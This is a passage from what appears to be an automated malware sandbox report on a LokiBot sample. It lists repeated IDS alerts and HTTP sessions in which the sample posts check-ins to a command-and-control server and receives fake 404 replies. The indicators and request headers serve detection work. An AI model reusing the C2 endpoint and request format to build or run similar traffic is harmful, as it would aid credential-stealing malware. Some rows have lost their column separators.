                  11/25/21-18:22:55.798213 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49766 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:55.798213 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:55.798213 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:55.798213 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49766 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:56.114465 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49766 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:22:58.836459 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49769 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:58.836459 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:58.836459 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:58.836459 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49769 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:22:59.163004 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49769 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:23:01.423938 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49770 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:01.423938 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:01.423938 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:01.423938 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49770 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:02.684122 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49770 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:23:07.452292 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49785 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:07.452292 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49785 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:07.452292 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49785 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:07.452292 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49785 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:07.544955 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49785 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:23:09.396769 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49809 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:09.396769 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49809 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:09.396769 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49809 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:09.396769 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49809 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:09.919206 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49809 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:23:13.834390 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49813 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:13.834390 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49813 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:13.834390 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49813 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:13.834390 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49813 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:13.931422 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49813 | 194.85.248.167 | 192.168.2.3
                  11/25/21-18:23:19.463239 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49814 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:19.463239 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49814 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:19.463239 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49814 | 80 | 192.168.2.3 | 194.85.248.167
                  11/25/21-18:23:19.463239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.2.3194.85.248.167
                  11/25/21-18:23:20.086960TCP2025483ET TROJAN LokiBot Fake 404 Response8049814194.85.248.167192.168.2.3
                  11/25/21-18:23:23.655365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3194.85.248.167
                  11/25/21-18:23:23.655365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3194.85.248.167
                  11/25/21-18:23:24.492060TCP2025483ET TROJAN LokiBot Fake 404 Response8049817194.85.248.167192.168.2.3
                  11/25/21-18:23:26.318058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.318058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.2.3194.85.248.167
                  11/25/21-18:23:26.435048TCP2025483ET TROJAN LokiBot Fake 404 Response8049818194.85.248.167192.168.2.3
                  11/25/21-18:23:27.828008TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.828008TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981980192.168.2.3194.85.248.167
                  11/25/21-18:23:27.923948TCP2025483ET TROJAN LokiBot Fake 404 Response8049819194.85.248.167192.168.2.3
                  11/25/21-18:23:29.237002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.237002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.3194.85.248.167
                  11/25/21-18:23:29.329433TCP2025483ET TROJAN LokiBot Fake 404 Response8049820194.85.248.167192.168.2.3
                  11/25/21-18:23:30.587831TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.587831TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.2.3194.85.248.167
                  11/25/21-18:23:30.896799TCP2025483ET TROJAN LokiBot Fake 404 Response8049821194.85.248.167192.168.2.3
                  11/25/21-18:23:32.864603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.864603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.3194.85.248.167
                  11/25/21-18:23:32.960193TCP2025483ET TROJAN LokiBot Fake 404 Response8049822194.85.248.167192.168.2.3
                  11/25/21-18:23:35.140691TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.140691TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3194.85.248.167
                  11/25/21-18:23:35.375536TCP2025483ET TROJAN LokiBot Fake 404 Response8049823194.85.248.167192.168.2.3
                  11/25/21-18:23:36.493113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3194.85.248.167
                  11/25/21-18:23:36.493113TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.3194.85.248.167
                  11/25/21-18:23:37.014189TCP2025483ET TROJAN LokiBot Fake 404 Response8049825194.85.248.167192.168.2.3
                  11/25/21-18:23:40.295826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.295826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.3194.85.248.167
                  11/25/21-18:23:40.387692TCP2025483ET TROJAN LokiBot Fake 404 Response8049827194.85.248.167192.168.2.3
                  11/25/21-18:23:41.914761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3194.85.248.167
                  11/25/21-18:23:41.914761TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.3194.85.248.167
                  11/25/21-18:23:42.233618TCP2025483ET TROJAN LokiBot Fake 404 Response8049829194.85.248.167192.168.2.3
                  11/25/21-18:23:44.612994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.612994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.2.3194.85.248.167
                  11/25/21-18:23:44.707285TCP2025483ET TROJAN LokiBot Fake 404 Response8049833194.85.248.167192.168.2.3
                  11/25/21-18:23:45.744734TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.744734TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.2.3194.85.248.167
                  11/25/21-18:23:45.839464TCP2025483ET TROJAN LokiBot Fake 404 Response8049845194.85.248.167192.168.2.3
                  11/25/21-18:23:46.879979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3194.85.248.167
                  11/25/21-18:23:46.879979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.3194.85.248.167
                  11/25/21-18:23:47.403833TCP2025483ET TROJAN LokiBot Fake 404 Response8049851194.85.248.167192.168.2.3
                  11/25/21-18:23:48.864530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.864530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.2.3194.85.248.167
                  11/25/21-18:23:48.959683TCP2025483ET TROJAN LokiBot Fake 404 Response8049855194.85.248.167192.168.2.3
                  11/25/21-18:23:51.197910TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3194.85.248.167
                  11/25/21-18:23:51.197910TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.2.3194.85.248.167
                  11/25/21-18:23:53.573219TCP2025483ET TROJAN LokiBot Fake 404 Response8049856194.85.248.167192.168.2.3
                  11/25/21-18:23:55.025972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.025972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.3194.85.248.167
                  11/25/21-18:23:55.525480TCP2025483ET TROJAN LokiBot Fake 404 Response8049857194.85.248.167192.168.2.3
                  11/25/21-18:23:56.479058TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3194.85.248.167
                  11/25/21-18:23:56.479058TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.2.3194.85.248.167
                  11/25/21-18:23:57.486293TCP2025483ET TROJAN LokiBot Fake 404 Response8049858194.85.248.167192.168.2.3
                  11/25/21-18:23:59.056904TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.056904TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.2.3194.85.248.167
                  11/25/21-18:23:59.210264TCP2025483ET TROJAN LokiBot Fake 404 Response8049859194.85.248.167192.168.2.3
                  11/25/21-18:24:00.760570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.760570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.2.3194.85.248.167
                  11/25/21-18:24:00.858030TCP2025483ET TROJAN LokiBot Fake 404 Response8049860194.85.248.167192.168.2.3
                  11/25/21-18:24:02.488226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.488226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.2.3194.85.248.167
                  11/25/21-18:24:02.585421TCP2025483ET TROJAN LokiBot Fake 404 Response8049861194.85.248.167192.168.2.3
                  11/25/21-18:24:04.158304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.158304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.2.3194.85.248.167
                  11/25/21-18:24:04.667956TCP2025483ET TROJAN LokiBot Fake 404 Response8049862194.85.248.167192.168.2.3
                  11/25/21-18:24:06.231426TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.231426TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.2.3194.85.248.167
                  11/25/21-18:24:06.343087TCP2025483ET TROJAN LokiBot Fake 404 Response8049863194.85.248.167192.168.2.3
                  11/25/21-18:24:07.945362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3194.85.248.167
                  11/25/21-18:24:07.945362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.2.3194.85.248.167
                  11/25/21-18:24:08.055054TCP2025483ET TROJAN LokiBot Fake 404 Response8049865194.85.248.167192.168.2.3
                  11/25/21-18:24:09.150416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.150416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.2.3194.85.248.167
                  11/25/21-18:24:09.249568TCP2025483ET TROJAN LokiBot Fake 404 Response8049866194.85.248.167192.168.2.3
                  11/25/21-18:24:11.256726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.256726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3194.85.248.167
                  11/25/21-18:24:11.963359TCP2025483ET TROJAN LokiBot Fake 404 Response8049867194.85.248.167192.168.2.3

                  Network Port Distribution

                  TCP Packets


                  HTTP Request Dependency Graph

                  • 194.85.248.167

                  HTTP Packets

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49744 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:15.658540010 CET | 1080 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:17.612982035 CET | 1081 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:15 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49745 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:18.837898016 CET | 1082 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:20.563548088 CET | 1082 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:18 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  10 | 192.168.2.3 | 49756 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:37.775846004 CET | 1116 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:39.011204958 CET | 1117 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:37 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  11 | 192.168.2.3 | 49757 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:40.734394073 CET | 1118 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:41.150240898 CET | 1118 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  12 | 192.168.2.3 | 49758 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:44.172504902 CET | 1119 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:44.258064032 CET  1120                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  13          192.168.2.3  49759        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:45.537822008 CET  1120                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:46.363115072 CET  1121                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  14          192.168.2.3  49760        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:47.475042105 CET  1122                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:47.564037085 CET  1123                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:47 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  15          192.168.2.3  49761        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
                  Nov 25, 2021 18:22:48.480655909 CET  1123                OUT        POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:48.579071045 CET  1124                IN         HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                  16          192.168.2.3  49762        194.85.248.167  80                C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp                            kBytes transferred  Direction  Data
